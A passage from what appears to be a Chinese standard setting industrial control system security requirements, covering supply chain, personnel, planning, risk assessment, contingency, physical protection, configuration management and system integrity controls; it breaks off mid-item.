服务(SA-6) 本项要求包括: a) 外部ICS 服务的提供商应遵从组织的信息安全策略要求、采用组织规定的安全控制措施,并遵 守相关的法律、法规、规章、标准和指南; b) 明确与外部 ICS 服务相关的安全角色和责任,并形成文档; c) 应采用规定的过程、方法和技术,对外部服务提供商所提供的安全控制措施的合规性进行持续 监控; d) 在获取指定的 ICS 安全服务前,进行组织层面上的风险评估; e) 确保获取的指定 ICS 安全服务,得到高层领导的批准; f) 应管理服务提供的变更,包括保持和改进现有的 ICS 信息安全策略、规程和控制措施,并考虑 到业务系统和涉及过程的关键程度及风险的再评估。 6.3.7 开发者配置管理(SA-7) 本项要求信息系统、系统组件及系统服务的开发者: a) 应在系统、组件或服务的设计、开发、实现和运行的过程中实施配置、变更管理,并形成相关 文档; b) 信息系统的变更应经过批准,考虑系统、组件及服务变更的安全影响并形成文档; c) 应跟踪系统、组件及服务的安全缺陷及应对措施; d) 组织要求 ICS 开发人员和集成人员提供软件的完整性检测,以便在软件交付后,支持组织进行 软件完整性验证; e) 在开发人员和集成人员指定的配置管理项缺少的情况下,组织为相关人员提供可选的配置管 理过程。 6.3.8 开发者安全测评(SA-8) 本项要求信息系统、系统组件及系统服务的开发者: a) 应制定并实施安全评估计划,针对相关的功能属性、外部可见接口、顶层设计、底层设计、系统 硬件、源代码等进行安全测评; b) 应对 ICS、系统组件及系统服务实施测试与评估(单元、集成、系统或回归测试),形成安全测评 报告; c) 应对安全测评过程中发现的系统漏洞进行更正; d) 组织应要求系统开发人员和集成人员使用代码分析工具检查软件中的公共漏洞,并建立分析 结果文档; e) 组织应要求系统开发人员和集成人员执行脆弱性分析,建立脆弱性、利用可能性以及风险缓解 文档; f) 组织应要求 ICS 开发人员和集成人员依据独立验证和确认代理的证据,创建并实现一个安全 测试和评估计划。 6.3.9 供应链保护(SA-9) 本项要求包括: a) 应将供应链安全作为综合信息安全防护战略的组成部分,以防 ICS、系统组件与 ICS 服务遭受 供应链安全所造成威胁; b) 组织应使用匿名的获取过程; c) 组织应购置初始获取中所有 ICS 部件以及相关附件; d) 对要获取的硬件、软件、固件或服务,在编入合同协议之前,组织应对供应方进行认真的评审; e) 有关ICS 、ICS部件以及信息技术产品,组织应使用可信的运输途径; f) 组织应使用多种多样的 ICS 、ICS部件、信息技术产品和ICS 服务的供应方; g) 组织应使用标准配置的 ICS 、ICS部件、信息技术产品; h) 组织应使ICS 、ICS 部件、信息技术产品的购置决策和交付之间的时间最短; i) 组织对交付的ICS 、ICS 构件、信息技术产品进行独立分析和渗透测试; j) 应建立供应链的安全评估规程; k) 应采用指定的安全措施来保障 ICS 关键组件的供应; 1) 应将危害性分析作为供应链风险管理的关键原则,确定供应链活动的优先级。在系统开发生 命周期中的指定决策点对ICS、系统组件或系统服务进行危害性分析,以识别关键的 ICS 模块 或功能。 6.3.10 开发过程、标准及工具(SA-10) 本项要求包括: a) ICS、系统组件或系统服务的开发人员应遵循软件工程的开发流程; b) 应明确安全需求、开发过程中需遵循的标准及可使用的工具,并记录工具的配置信息与特殊 选项; c) 应对开发过程中的工具与变更进行管理; d) 应定期对开发过程、标准、工具及配置文件进行审核。 6.3.11 网络服务安全(SA-11) 本项要求包括: a) 安全特性、服务级别以及所有网络服务的管理要求应予以确定并包括在所有网络服务协议中。 无论这些服务是由内部提供的还是外包的。 6.4 人员安全(PS) 6.4.1 人员安全的方针策略及规程(PS-1) 本项要求包括: a) 应制定并发布人员安全的方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相 关部门的协调、合规性; b) 应制定并发布人员安全的规程,以推动人员安全的方针策略及与相关安全控制的实施; c) 应定期对人员安全的方针策略及规程进行评审和更新。 6.4.2 岗位风险(PS-2) 本项要求包括: a) 应建立 ICS 岗位分类机制; b) 应评估 ICS 所有岗位的风险; c) 应建立人员审查制度,尤其对控制和管理ICS 的关键岗位的人员进行审查; d) 应定期对岗位风险进行评审和更新。 6.4.3 人员审查(PS-3) 本项要求包括: a) 应在授权访问ICS 之前进行人员审查; b) 应在人员离职或岗位调动时对其进行审查; c) 组织应确保每个访问涉及组织秘密信息处理、存储或传输ICS 的用户,按该ICS 最高信息秘密 等级进行人员审查,并对访问人员进行了相应的保密教育; d) 组织确保每个访问涉及敏感信息处理、存储或传输 ICS 的用户,按该系统敏感信息的最高秘密 等级进行人员审查,并对访问人员进行了相应的保密教育。 6.4.4 人员离职(PS-4) 本项要求包括: a) 应终止离职人员对 ICS 系统的访问权限; b) 应删除与离职人员相关的任何身份鉴别信息; c) 应与离职人员签订安全保密协议; d) 应收回离职人员所有与安全相关的系统的相关所有权; e) 应确保离职人员移交信息和ICS 的可用性。 6.4.5 人员调动(PS-5) 本项要求包括: a) 应在人员调动至其他岗位时,评审该人员对 ICS 的逻辑和物理访问权限并根据评审结果调整 访问权限。 6.4.6 访问协议(PS-6) 本项要求包括: a) 应制定 ICS 的访问协议并形成文件。 b) 应定期评审并更新访问协议。 c) 应确保在人员授权访问ICS 之前与其签订访问协议,并在访问协议更新或到期后重新签订。 d) 组织应确保特殊保护措施 ICS 的访问,仅授权给: 1) 具有有效访问授权的人; 2) 满足相关人员安全准则的人。 e) 组织应确保特殊保护措施的秘密信息的访问,仅授权给: 1) 具有有效访问授权的人; 2) 满足相关的、符合可用的法律的人员安全准则的人; 3) 已阅读、理解已签署保密协议的人。 6.4.7 第三方人员安全(PS-7) 本项要求包括: a) 应为第三方提供商建立包含安全角色和责任的人员安全要求,并形成文件; b) 第三方提供商应遵守已制定的人员安全方针策略和规程; c) 应要求第三方提供商在任何人员调动或离职时予以告知; d) 应监视第三方提供商的合规性。 6.4.8 人员处罚(PS-8) 本项要求包括: a) 应对违反信息安全方针策略和规程的人员建立违规处罚制度。 6.5 规划(PL) 6.5.1 安全规划策略及规程(PL-1) 本项要求包括: a) 应制定并发布安全规划的策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关部 门的协调、合规性; b) 应制定并发布安全规划规程,以推动安全规划的策略及与相关安全控制的实施; c) 应定期对安全规划的策略及规程进行评审和更新。 6.5.2 系统安全规划(PL-2) 本项要求包括: a) 应结合当前信息系统安全的实践经验,并考虑信息系统与工业控制系统间的关键差异,制定系 统的安全规划,并获得管理者的审核批准; b) 在安全规划中应明确定义ICS 系统的授权边界、描述系统使命与业务流程的相关性、提供系统 的安全分类、描述系统的运营环境及与其他系统的关联关系、提供系统安全需求的概要描述及 针对这些安全需求的安全控制等; c) 应定期对 ICS 系统安全规划进行评审和更新; d) 当 ICS 系统或运行环境发生变化,或者在系统安全规划实施或评估过程中发现问题时,应及时 更新系统安全规划; e) 向指定的角色或个人分发系统安全规划,并针对安全规划的后续变化进行沟通; f) 应对 ICS 系统安全规划的内容进行保护,以防止泄露或未授权更改; g) 对影响ICS 系统安全的活动,在其实施前应进行规划及人员协调,以减少对其他系统的影响 6.5.3 行为规则(PL-3) 本项要求包括: a) 应建立用户对 ICS 进行访问的行为规则,明确其职责及其对信息系统的预期使用方式; b) 应签订用户协议,确保用户在授权访问信息及 ICS 之前,已清晰理解并同意遵守行为规则的 约束; c) 在行为规则中,组织应显式限制对社会网站的使用,限制在商业网站上邮送信息,限制共享系 统的账户信息; d) 应定期对用户信息系统的访问行为规则进行更新与评审。 6.5.4 信息安全架构(PL-4) 本项要求包括: a) 应基于纵深防御的思想制定 ICS 的信息安全架构,描述信息安全保护的需求、方法及有关外部 服务的安全假设或依赖关系; b) 应考虑ICS 信息安全体系的变更对安全规划、系统采购过程的影响; c) 应定期审核并更新 ICS 信息安全架构; d) 应在预定义的位置和架构层部署特定的安全防护以获得全面的安全保障。 6.5.5 安全活动规划(PL-5) 本项要求包括: a) 对于可影响 ICS 的安全活动,在进行前,组织应规划并协调,以便减少对组织运行、组织资产和 个体的影响。 6.6 风险评估(RA) 6.6.1 风险评估方针策略与规程(RA-1) 本项要求包括: a) 应制定并发布风险评估的方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相 关部门的协调、合规性; b) 应制定并发布风险评估规程,以推动风险评估的方针策略及与相关安全控制的实施; c) 应定期对风险评估的方针策略及规程进行评审和更新。 6.6.2 安全分类(RA-2) 本项要求包括: a) 应依据适用的法律、法规、规章及相关标准,对ICS 进行安全分类; b) 应在ICS 安全规划文件中包含 ICS 的安全分类及分类依据; c) 安全分类应通过主管部门的审查和批准。 6.6.3 安全风险评估(RA-3) 本项要求包括: a) 应制定 ICS 及相关信息系统的安全风险评估计划,明确风险评估的对象、内容及评估流程; b) 应按安全风险评估计划在系统上线前或系统维修期间对指定系统实施风险评估,并形成风险 评估报告; c) 应将风险评估结果向相关人员通报,并定期对风险评估的结果进行评审; d) 当系统或其运行环境发生重大变更(包括发现新的威胁和漏洞),或出现其他可能影响系统安 全状态的条件时,应重新进行风险评估。 6.6.4 漏洞扫描(RA-4) 本项要求包括: a) 应在 ICS 系统上线前、系统维修期间或非业务高峰期对指定系统及相关应用程序进行脆弱性 扫描分析,标识并报告可影响该系统或应用的新漏洞; b) 推荐在规定的响应时间内对漏洞进行修复,修复用的补丁应经过充分的验证,修复后需重新对 ICS 系统进行风险评估; c) 应在指定的人员及受限范围内共享脆弱性扫描及安全评估过程中发现的漏洞信息,以便消除 其他 ICS 系统中的类似漏洞; d) 组织使用的扫描工具,应具有容易调整扫描配置能力,并通过实际验证; e) 组织定期或当标识和报告新的漏洞或者脆弱性时,调整已扫描的 ICS 扫描计划; f) 组织应明确 ICS 中的何种信息需要保密; g) 为支持更全面的扫描活动,对组织标识的ICS 组件,应被赋予特定的访问授权; h) 组织应评审历史审计日志,确定所标识的脆弱性是否存在可被利用的可能性; i) 组织应进行ICS 的脆弱性分析,基于脆弱性分析,执行ICS 上的渗透测试,以便确定所标识的 脆弱性的可利用性; j) 应规定漏洞扫描工具更新的频率,并在漏洞扫描之前验证工具的有效性; k) 应专门针对老旧设备制定漏洞扫描策略,明确规定漏洞扫描工具的版本、适用设备型号等 内容; 1) 应根据 ICS 系统脆弱性扫描结果及报告,度量漏洞的影响并进行安全风险评估; m) 应根据漏洞的影响程度对漏洞进行分级,并按照漏洞等级进行扫描; n) 应规定对ICS 进行漏洞扫描的时间频率,并明确进行漏洞扫描的责任人。 6.7 应急规划(CP) 6.7.1 应急规划方针策略与规程(CP-1) 本项要求包括: a) 应制定并发布应急规划方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关 部门的协调、合规性; b) 应制定并发布应急规划规程,以推动应急规划方针策略及与相关安全控制的实施; c) 应定期对应急规划方针策略及规程进行评审和更新。 6.7.2 应急计划(CP-2) 本项要求包括: a) 应制定 ICS 应急计划并获得管理层批准。计划中应识别ICS 业务应急需求、规定系统恢复优 先级与目标、明确责任人; b) 应制定 ICS 灾难恢复计划并获得管理层批准。灾难恢复计划应包含:启动灾难恢复计划的事 件;由自动运行变更手动运行规程;由远程控制变更为就地控制规程;响应者的角色和职责;备 份及存储的规程;逻辑网络图;授权对 ICS 进行物理和逻辑访问的人员清单;联系信息(包括 ICS 厂商、网络管理员、ICS 支持人员等);当前配置信息;部件更换要求; c) 应按已确定的应急计划角色设置,将应急计划分发下去; d) 应定期评审和更新应急计划,以反映组织、ICS 或运行环境的变更; e) 组织应协调应急计划与其他计划间的一致性; f) 组织应规划应急处理时的信息处理、通信和环境等支撑能力; g) 组织应维护应急计划,保障基本业务功能在规定的时间内保持正常运行; h) 组织应维护硬件计划,保障异地运行时基本业务功能不受影响或很少受影响; i) 组织应维护应急计划,保障全部业务功能在规定的时间内保持正常运行; j) 组织应维护硬件计划,保障异地运行时全部业务功能不受影响或很少受影响 k) 应协调处理应急规划活动与事件处理活动; 1) 应急计划变更时,应告知相关方; m) 对应急计划进行安全管理,以防泄露和未授权更改; n) 应制定 ICS 故障的应急预案,以便在 ICS 发生故障时,可及时启动应急预案。 6.7.3 应急培训(CP-3) 本项要求包括: a) 应制定应急培训计划,并向具有相应角色和职责的 ICS 用户提供应急培训; b) 应定期或在 ICS 变更时,对相应人员进行应急培训; c) 模拟事件以配合应急培训,使得人员在危难时刻具备高效的应对能力; d) 使用自动化机制提供更加全面、真实的培训环境。 6.7.4 应急计划的测试和演练(CP-4) 本项要求包括: a) 应测试和演练 ICS 的应急计划;有备用处理场所的应在备用处理场所进行测试和演练;尽量采 用自动机制进行; b) 测试和演练时,应与负责相关计划的组织内各部门之间协调; c) 测试和演练后,应将ICS 完整恢复和重建到已知状态; d) 应评审应急计划的测试结果;如有不合格项应启动纠正措施; e) 应定期或应急计划变更时,进行应急计划的测试和演练; f) 组织协调应急计划与其他相关计划相一致的测试和演练; g) 组织可在备用系统上测试、演练应急计划,并评估备用系统的应急处理能力; h) 组织应设计一套完整的工业控制系统的恢复和再构造,以便了解持续性计划测试部分的安全 状态; i) 组织应采用自动化机制,更彻底、有效地测试和演练应急计划。 6.7.5 备用存储场所(CP-5) 本项要求包括: a) 应建立备用存储场所,包括许可存储和恢复 ICS 备份信息的必要协议; b) 应确保备用存储场所的信息安全防护措施与主存储场所相同; c) 备用存储设备与主存储设备实施物理隔离,以防止受到同样灾难的破坏; d) 对备用存储设备进行配置,保证其进行及时有效的恢复操作; e) 明确当发生区域性破坏或灾难时,备用存储设备潜在的问题,并明确补救措施。 6.7.6 备用处理场所(CP-6) 本项要求包括: a) 应建立备用处理场所;并规定 ICS 迁移至备用处理场所并重启运行的时间要求; b) 应确保迁移和恢复运行所需要的设备和供给在备用场所可用; c) 应确保备用处理场所的信息安全防护措施与主处理场所相同; d) 备用处理设备与主处理设备实施物理隔离,以防止受到同样灾难的破坏; e) 组织应明确灾难发生时的迁移行动,并保障灾难发生时备用处理设备可用; f) 组织应按业务可用性需求,开发备用设备的替代服务优先级; g) 组织应配置备用设备为就绪状态,准备支持基本的业务功能; h) 组织应确认备用设备提供的安全功能与主设备一致。 6.7.7 电信服务(CP-7) 本项要求包括: a) 应建立备用电信服务,并规定ICS 切换到备用电信服务的时间要求; b) 组织应根据本组织的可用性要求,开发包含优先服务条款的主、备用电信服务协议; c) 组织在选择备用电信服务时,应考虑降低单点故障,尽可能选择不同的服务商; d) 组织应要求主、备电信服务商均提供应急响应计划。 6.7.8 系统备份(CP-8) 本项要求包括: a) 应制定 ICS 备份策略。备份策略应包括:备份方式、备份频率、备份内容、备份介质等; b) 应按照已制定的ICS 备份策略对用户级信息、系统级信息及ICS 文档进行备份,增量备份应每 天一次,全量备份应每周一次; c) 应采取安全防护措施,保护备份信息的保密性、完整性和可用性; d) 采用合适的机制(如数字签名、加密散列)对 ICS 备份信息进行完整性保护; e) 按预定的频率对备份信息进行测试以确保介质的可靠性和信息的完整性,保证备份信息的可 用性; f) 作为应急计划测试和演练的一部分,在恢复ICS 功能时有选择的使用备份信息; g) 将操作系统和其他重要 ICS 软件的备份副本存储在隔离设备上或者没有配置操作软件的存储 器中; h) 建立异地灾备中心,利用通信网络将信息实时备份到异地灾备中心; i) 建设备份系统,实现ICS 数据的自动备份。 6.7.9 ICS 恢复和重建(CP-9) 本项要求包括: a) 应在 ICS 中断、受损或失败后将其恢复和重建到一个已知状态; b) 应将系统状态变量作为恢复指标之一,并将其作为系统重建的一个部分; c) 组织提供一套补偿的安全控制,定期将系统恢复到确定的状态; d) 组织提供一套在规定的时间间隔内,将ICS 组件恢复到安全和运行状态; e) 按组织规定的时间内,配置实时或准实时的失败恢复能力; f) 组织应对备份/恢复所用的硬件、软件和固件实施保护; g) 应定期测试恢复信息,以验证可靠性和信息完整性。 6.8 物理和环境安全(PE) 6.8.1 物理和环境保护方针策略与规程(PE-1) 本项要求包括: a) 应制定并发布物理和环境保护方针策略,内容至少应包括:目的、范围、角色、责任、管理层承 诺、相关部门的协调、合规性; b) 应制定并发布物理和环境保护规程,以推动物理和环境保护方针策略及与相关安全控制的 实施; c) 应定期对物理和环境保护方针策略及规程进行评审和更新。 6.8.2 物理访问授权(PE-2) 本项要求包括: a) 应制定和维护对 ICS 设施具有访问权限的人员名单; b) 应定期对授权访问人员名单进行评审和批准; c) 应根据职位、角色对 ICS 设施进行物理访问授权。 6.8.3 物理访问控制(PE-3) 本项要求包括: a) 应加强对所有 ICS 设施指定进出口的物理访问控制; b) 应在指定进出口采用如围墙、门禁卡、门卫等物理访问控制措施,具有物理访问授权不代表对 该区域 ICS 组件有逻辑访问权; c) 应在访问ICS 设施前对人员的访问权限进行验证; d) 应维护物理访问记录; e) 应制定公共访问区访问控制策略; f) 应在需要对访客进行陪同和监视的环境下对访问者的行为进行陪同和监视; g) 组织应控制对 ICS 的物理访问,这些控制应独立于对设施的物理访问控制; h) 应对较容易进入且拥有可移动介质驱动器的计算机采取带锁、卸载或禁用等手段提高安全性; i) 应将服务器放置在带锁的区域并采用认证保护机制; j) 应将ICS 网络设备放置在只能由授权人员访问的符合环境 6.8.4 传输介质的访问控制(PE-4) 本项要求包括: a) 应采用安全防护措施对ICS 设施内的传输线路进行物理访问控制。 6.8.5 输出设备的访问控制(PE-5) 本项要求包括: a) 应对 ICS 输出设备进行物理访问控制以防止非授权人员获得输出信息; b) 控制对输出设备的物理访问; c) 确保只有授权人员收到来自设备的输出信息; d) 组织应对输出设备进行标记,标明该标记的输出设备可输出的信息。 6.8.6 物理访问监控(PE-6) 本项要求包括: a) 应监视 ICS 物理访问以检测物理安全事件,并对其作出响应; b) 组织应设置防盗报警系统,识别潜在入侵、实时入侵报警并发起适当的响应行为; c) 组织应采用自动化设备识别入侵,并实施自动响应动作; d) 组织应采用视频监控,并保留视频记录; e) 应定期对物理访问日志进行审查; f) 应在发生事件或发现事件迹象的情况下对物理访问日志进行审查。 6.8.7 访问记录(PE-7) 本项要求包括: a) 应维护 ICS 设施的访问记录; b) 应定期对访问记录进行评审; c) 组织使用自动化的机制促进访问日志的维护和回顾; d) 组织维护所有物理访问的记录,包括访客和授权用户。 6.8.8 电源设备与电缆(PE-8) 本项要求包括: a) 应保护ICS 的电源设备与电缆免遭损害和破坏; b) 应依据安全需求和风险,采用禁用或对电源进行物理保护的手段来防止系统的非授权的使用; c) 组织应使用冗余的电力设备和电缆; d) 组织应对关键ICS 部件,使用自动化灾难备份等安全控制措施。 6.8.9 紧急断电(PE-9) 本项要求包括: a) 应确保在紧急情况下能够切断 ICS 电源或个别组件电源; b) 应在指定位置设置安全易用的紧急断电开关或设备; c) 应保护紧急断电装置设备,以防止非授权操作。 6.8.10 应急电源(PE-10) 本项要求包括: a) 应为 ICS 配备应急 UPS 电源,并计算其续航时间; b) 应提供短期不间断电源,以便在主电源失效的情况下正常关闭 ICS; c) 应提供长期备份电源,以便主电源失效时在规定时间内保持 ICS 功能; d) 组织提供给 ICS 备用电力供应系统,ICS 能够在主电源长期丧失的事故中有能力维持 ICS 所 必须的最小的运行能力; e) 组织提供 ICS 长期的备用电力供应系统,该系统是独立运行而不依赖外部电源的。 6.8.11 应急照明(PE-11) 本项要求包括: a) 应为 ICS 部署应急照明并进行维护,确保其在断电情况下的可用性; b) 应在应急照明设施中包含紧急通道和疏散通道指示牌。 6.8.12 消防(PE-12) 本项要求包括: a) 应为ICS 部署火灾检测和消防系统或设备,并维护该设备; b) 应为消防系统或设备配备独立电源; c) 应使用防火设备或系统,该设备或系统在火灾事故中会自动激活并通知组织和紧急事件处理 人员; d) 应使用灭火设备或系统,该设备或系统为组织和紧急事件处理人员提供任何激活操作的自动 通知; e) 应使用自动灭火系统; f) ICS 组件集中部署的区域,如主机房、通信设备机房等应采用具有耐火等级的建筑材料,采取 区域隔离防火措施,将重要设备与其他设备隔离。 6.8.13 温湿度控制(PE-13) 本项要求包括: a) 应维护 ICS 所在设施的温湿度,使其处于可接受的范围; b) 应定期监视温湿度; c) ICS 组件集中部署的区域,如主机房、通信设备机房等应设置温湿度自动调节设施,使机房温 湿度的变化在设备运行所允许的范围之内。 6.8.14 防水(PE-14) 本项要求包括: a) 应提供易用、工作正常的、关键人员知晓的总阀门或隔离阀门以保护 ICS 免受漏水事故的 损害; b) ICS 组件集中部署的区域,如主机房、通信设备机房等水管安装不得穿过机房屋顶和活动地板 下,防止雨水通过机房窗户、屋顶和墙壁渗透; c) 组织应使用自动化机制,在重大漏水事故时能保护ICS 免受水灾。 6.8.15 交付及移除(PE-15) 本项要求包括: a) 应对所有进出设施的ICS 组件进行授权、监视、控制,并维护相关记录。 6.8.16 备用工作场所(PE-16) 本项要求包括: a) 备用工作场所实施的安全控制措施应与当前工作场所等同; b) 应评估备用工作场所安全控制措施的可行性和有效性; c) 应提供安全事件发生时与信息安全人员沟通的渠道。 6.8.17 信息泄露(PE-17) 本项要求包括: a) 应避免因电磁泄露、传导等方式造成的信息泄露。 6.9 配置管理(CM) 6.9.1 配置管理方针策略和规程(CM-1) 本项要求包括: a) 应制定并发布配置管理方针策略,内容至少应包括:目的、范围、角色、责任、管理层承诺、相关 部门的协调、合规性; b) 应制定并发布配置管理规程,以推动配置管理方针策略及与相关安全控制的实施,该规程应与 相关法律、制度、策略、规章、标准和指南保持一致; c) 应定期对配置管理方针策略及规程进行评审和更新。 6.9.2 基线配置(CM-2) 本项要求包括: a) 应制定、记录并维护 ICS 当前的配置基线; b) 应定期或在系统发生重大变更、安装和更新系统组件后,对基线配置进行评审和更新; c) 应保留旧版本 ICS 基线配置,以便必要时恢复配置; d) 应定期根据组织要求,在系统部件进行整体安装和升级等情况下评审并调整ICS 的基线配置; e) 组织为开发和测试环境,维护一个基线配置,该配置与组织运行的基线配置是采用不同方式管 理的; f) 组织保留被认为可支持回滚的、老的基线配置版本; g) 组织使用自动化机制,及时维护 ICS 配置,确保保持完整、准确、就绪可用的基线; h) 组织应开发并维护已授权可在组织ICS 予以执行的软件列表,使用拒绝授权、除此之外的允许 授权策略,标识在组织 ICS 上所有被允许执行的软件; i) 组织应开发并维护没有被授权可在组织ICS 上执行的软件列表,使用显式的拒绝授权策略,标 识在组织ICS 上所有被允许执行的软件。 6.9.3 配置变更控制(CM-3) 本项要求包括: a) 应明确系统受控配置列表中,包含了哪些变更内容; b) 应评审所提交的ICS 变更事项,并根据其影响结果,进行批准或否决; c) 应将 ICS 相关的配置变更决策形成文件; d) 应保留对 ICS 配置的变更记录; e) 应对系统配置变更的活动进行评审; f) 应明确配置变更控制的管理部门,协调和监管配置变更的相关活动; g) 组织在实现ICS 变更前,应测试、确认这些对 ICS 的变更,并建立相应的文档; h) 组织使用自动化机制,来建立 ICS 配置变更记录文档,通知指定批准机构,强调在规定期限内 没有接受到的批准将禁止变更,并在接受到指定的批准后,建立对 ICS 完成变更的文档; i) 组织使用自动化机制,实现对当前ICS 基线的变更,并通过所安装的配置库,开发调整基线; j) 组织需在配置变更管理部门中设置一个信息安全代表作为部门成员; k) 变更控制管理部门和配置变更频率/条件应得到管理层的批准; 1) 在 ICS 不支持自动生成配置变更审计记录的情况下,需要采用其他控制措施; m) 应对软件包的修改进行劝阻,只限于必要的变更,且对所有的变更加以严格控制。 6.9.4 变更安全影响分析(CM-4) 本项要求包括: a) 在实施变更之前,应对 ICS 配置变更进行分析,判断该变更可能带来的潜在安全影响; b) 在新软件被安装到运行环境前,在不同的测试环境中进行测试、分析,寻找由于弱点、不足、不 相容或恶意所产生的安全影响; c) 在实施ICS 变更后,应检测安全功能,以验证变更已被正确地实现,且满足相应系统的安全 需求。 6.9.5 对变更的访问限制(CM-5) 本项要求包括: a) 应定义、记录、批准和实施与 ICS 变更相关的物理和逻辑访问限制; b) 应限制 ICS 开发方和集成方对生产环境中的 ICS 及其硬件、软件和固件的直接变更; c) 组织应使用自动化机制执行访问限制,支持执行动作的审计; d) 组织应定期进行 ICS 变更的审计,分析未经授权的变更; e) ICS 应禁止安装没有得到组织认可和批准的软件程序; f) 对组织定义的ICS 部件和系统层信息的变动,执行双人规则; g) 组织应限制系统开发人员和集成人员,在生产环境中只有授权才能更改硬件、软件和固件以及 系统配置信息;定期评审并重新评估 ICS 开发人员/集成人员的权利; h) 组织应保护软件库,以免引入未授权的代码或恶意代码; i) ICS 实现自动功能或机制,以发现不恰当的系统变更。 6.9.6 配置设置(CM-6) 本项要求包括: a) 应依据安全配置检查清单,实施 ICS 中所使用产品的配置,并实现与运行需求一致的模式; b) 应基于 ICS 的运行需求,评估 ICS 组件与已设配置存在的偏差,并对其进行标识和记录; c) 应根据相关策略和规程,监控配置设置项的变更; d) 应使用自动机制,对配置设置进行集中管理、应用和验证。不支持自动化机制的 ICS, 采用其 他方式进行集中管理,应用,并验证配置设置; e) 应将检测到的未授权的、与安全相关的配置变更纳入到事件响应中,以确保对被检测事件的追 踪、监视、纠正,并形成可用的历史记录; f) 组织使用自动化机制,集中管理、应用并验证配置设置; g) 组织使用自动化机制,对未授权改变的配置改版作出响应; h) 组织应将发现的未授权、与安全有关的配置改变,结合到组织的安全事件响应能力,以确保每 一个所发现的事件予以跟踪、纠正; i) ICS 在引入到生产环境前,应证实其符合安全配置指南; j) 应有规程来控制在系统上运行的安全软件。 6.9.7 配置最小功能化(CM-7) 本项要求包括: a) 应对信息系统按照仅提供最小功能进行配置,并按照定义的列表,对非必要功能、端口、协议和 服务的使用进行禁止或限制; b) 应定期对信息系统进行评审,以标识和排除不必要的功能、端口、协议和服务; c) 为标识并消除不必要的功能、端口、协议和服务,定期对 ICS 进行风险评估; d) 组织使用自动化机制,应对授权软件程序、未授权软件程序的执行; e) 组织应确保提供了满足组织需求的功能、端口、协议和服务。 6.9.8 ICS部件清单(CM-8) 本项要求包括: a) 应制定 ICS 组件清单,并形成文件。该清单应能准确反映当前 ICS, 符合已授权的 ICS 边界, 达到追踪和报告所需要的详细程度; b) 当一个完整的组件安装和移除,或系统更新时,应更新系统组件清单; c) 应使用自动机制来检测ICS 中新增的未授权组件或设备。当检测到未授权的组件或设备时, 应禁止网络访问、并进行隔离,并通知相关的管理人员; d) 组织应通过某一个或几个属性标识ICS 组件的可核查性; e) 组织应验证 ICS 物理边界内的所有组件或已被列入清单,作为系统的一部分,或被其他系统所 知道,作为那个系统中的一部分; f) 组织应关注在ICS 组件清单中所有配置; g) 应定期对 ICS 清单进行评审和更新; h) 记录日志的设施和日志信息应加以保护,以防止篡改和未授权的访问; i) 系统管理员、系统操作员的活动应记入日志。 6.9.9 配置管理计划(CM-9) 本项要求包括: a) 应制定、记录和实施ICS 的配置管理计划,配置管理计划应包括:角色和职责、配置管理的流程 和过程; b) 应建立贯穿系统开发生命周期的配置管理流程,识别所有的配置项,并进行管理; c) 应保护配置管理计划免受未授权的泄露和修改; d) 组织把开发配置管理过程的责任,赋予不直接参与系统开发的组织人员。 6.10 系统和信息完整性(SI) 6.10.1 系统和信息完整性方针策略和规程(SI-1) 本项要求包括: a) 应制定并发布系统和信息完整性保护方针策略,内容至少应包括:目的、范围、角色、责任、管理 层承诺、相关部门的协调、合规性; b) 应定期对系统和信息完整性保护方针策略及规程进行评审和更新。 6.10.2 漏洞修复(SI-2) 本项要求包括: a) 应对系统中存在的漏洞进行标识、报告并进行纠正; b) 漏洞相关的软件和固件升级包在安装前,应验证其有效性并评估可能带来的后果; c) 在软件和固件升级包发布后,应在适当的时间进行升级并明确升级和维护频率; d) 应将漏洞修复并入组织的配置管理过程之中; e) 统一管理漏洞修补程序和自动化升级程序; f) 根据定期采用自动化机制,根据ICS 及组件的状态实施漏洞修复; g) 根据 ICS 确定的安全基准线来度量漏洞识别与漏洞修复间的关系; h) 组织采用自动化的补丁管理工具,以方便漏洞修复; i) 应明确升级软件和固件升级包维护功能的责任人。 6.10.3 恶意代码防护(SI-3) 本项要求包括: a) 应在ICS 网络出入口部署恶意代码防护机制,并根据组织的配置管理策略和规程,在新的升级 包发布后进行更新; b) 应在设备上线前或者检修期间对 ICS 进行扫描,对于发现的问题要及时解决并上报; c) 应评估恶意代码检测发现的误报,在处理过程中对系统所产生的影响; d) 集中管理恶意代码防护机制; e) 自动升级恶意代码防护机制; f) 防止非特权用户绕过恶意代码保护功能; g) 组织应限制便携式设备在 ICS 中的使用; h) 组织应定期检测恶意代码防护机制的有效性。 6.10.4 ICS 监视(SI-4) 本项要求包括: a) 应对 ICS 进行监视,以检测攻击和攻击迹象,检测本地、网络的和远程的未授权连接; b) 应按照组织定义的技术和方法来发现对 ICS 的未授权使用; c) 应在ICS 内部署监视设备,收集相关的重要信息,在特定位置部署临时性的监视设备,对特性 业务类型进行监视; d) 应对入侵检测工具收集的信息进行保护,防止对信息的未授权访问、修改或删除; e) ICS 的监视活动应符合适用的法律、法规、规章方面的要求; f) 组织应采用自动化工具来支持事件的实时分析; g) 系统应监控进出的非正常和未授权通信; h) 系统应根据组织定义的显示威胁进行实时报警; i) 系统应具有防止非授权用户绕开入侵检测/防御系统的能力; j) 组织应将独立的入侵检测工具通过通用协议整合到组织层面的 IDS 中 k) 组织应将入侵检测工具与访问控制、流量控制等机制整合,以快速响应攻击; 1) 当组织运行、资产、人及与其他组织或国家有关 ICS 运行的信息安全风险趋势增加时,应提高 ICS 监视活动的级别。 6.10.5 安全警报、建议和指示(SI-5) 本项要求包括: a) 应持续地从指定的外部组织接收安全警报、建议和指示; b) 应在必要时发布内部的安全警报、建议和指示; c) 应向承担系统管理、监视或安全职责的相关人员传达安全警报、建议和指示; d) 应按照时间计划实施安全指示并通报完成情况; e) 组织采用自动化机制及时获取组织所需的这些安全报警和安全指令。 6.10.6 安全功能验证(SI-6) 本项要求包括: a) 应验证既定的安全功能是否正确运行; b) 应在系统启动或重启时实施安全验证或者定期实施安全验证; c) 应将失败的测试情况通知相关人员; d) 系统应提供自动安全验证失败通知功能; e) 系统应提供自动安全验证支持功能; f) 应向组织相关负责人报告安全功能验证结果。 6.10.7 软件、固件和信息完整性(SI-7) 本项要求包括: a) 应采用完整性验证工具来检测对软件、固件或者 ICS 的未授权修改; b) 组织应定期重新评估软件和信息的完整性; c) 